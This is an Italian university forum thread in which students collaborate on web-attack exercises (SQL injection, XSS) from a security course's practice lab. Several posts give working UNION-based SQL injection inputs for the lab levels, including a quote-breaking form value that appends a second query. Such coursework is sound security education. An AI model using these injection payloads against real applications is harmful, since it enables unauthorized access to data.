.dsy:it. - Esercizi Sicurezza - Attacchi Web II PARTE

Calendar

Members

Faq

Logout

.dsy:it. : Powered by vBulletin version 2.3.1

.dsy:it. > Didattica > Corsi N - Z > Sicurezza > Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011

Last Thread Next Thread

Author

Thread Expand all | Contract all

gennaro

ANZIANOTTO

User info:

Registered: Apr 2004
Posts: 65 (0.01 al dì)
Location: milano
Corso: comunicazione digitale
Anno: secondo
Time Online: 1 Day, 16:27:37 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011

Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?

13-05-2011 14:15

Click here to Send gennaro a Private Message

zack1988

.primate.

User info:

Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Risolti i vari problemi sull'SQL Injection, non sono complicati, cercando un pó in rete ho visto che si puó usare l'istruzione UNION di SQL per bypassare la query:

Es: sqli2
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Es: sqli3
SELECT counter, concorrente FROM sqli3 WHERE counter=999 UNION SELECT concorrente, squadra FROM sqli3 WHERE classificato=1;

Es: sqli4
SELECT counter, concorrente FROM sqli4 LIMIT 0, 0 UNION SELECT concorrente, squadra FROM sqli4 WHERE classificato=1

13-05-2011 16:16

Click here to Send zack1988 a Private Message

zack1988

.primate.

User info:

Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Si poteva risolvere in un'altro modo findendo la query:
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX';
e di seguito inserire la propria query
SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Ma non so perché da console sql tutto ok, nella form invece continua a darmi un errore sulla sintassi SQL.

13-05-2011 16:20

gennaro

ANZIANOTTO

Post actions:

Edit | Report | IP: Logged

zack quelle query le scrivi nello spazio apposta o nell'url o da qualche altra parte? perchè ho provato ma nn me ne funziona neanche uno di quelli che hai scritto O_o
p.s. a meno che debba usare burp, cosa ke odio e che quindi non uso mai

14-05-2011 00:19

zack1988

.primate.

User info:

Registered: Oct 2007
Posts: 75 (0.01 al dì)
Location: Milano
Corso: Informatica
Anno: 1
Time Online: 2 Days, 2:43:36 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

No devi scrivere solo una parte :
Es SQLI2
Nella pagina c'è scritto SQL query: SELECT counter, concorrente FROM sqli2 WHERE concorrente=''

e bisogna completarlo inserendo nella form:
XXXXXXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1

e quando premi invio si nota vedi la query che ho scritto nel post precedente.

Gli altri es sono uguali tranne che non hai una form ma devi inviare una POST.

Spero di essere stato chiaro

14-05-2011 12:46

gennaro

ANZIANOTTO

Post actions:

Edit | Report | IP: Logged

spiegazione impeccabile! grazie mille!

14-05-2011 14:39

simoki

antani

User info:

Registered: Apr 2007
Posts: 23 (0.00 al dì)
Location: milano
Corso: Informatica
Anno: 3
Time Online: 15:43:51 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Re: Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011

Originally posted by gennaro
Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?

Recipes e Marmot Memo (con una delle due varianti) superati.
per gli altri ancora niente..

14-05-2011 18:10

Click here to Send simoki a Private Message

gennaro

ANZIANOTTO

Post actions:

Edit | Report | IP: Logged

non ho ancora dato un'occhiata a tutti questi livelli
si tratta sempre di SQL injection e XXS o come negli altri bisogna guardare codice sorgente, script cookie, etc?

16-05-2011 00:20

gennaro

ANZIANOTTO

Post actions:

Edit | Report | IP: Logged

come hai fatto a fare quei due livelli?? non riesco proprio a riuscirci (in particolare Marmot Memo, sto impazzendo!!! XD)

18-05-2011 16:42

MarcoVigna17

.precettore.

User info:

Registered: Dec 2007
Posts: 92 (0.01 al dì)
Location: Robecco sul Naviglio
Corso: Informatica
Anno: 1
Time Online: 20:21:26 [...]
Status: Offline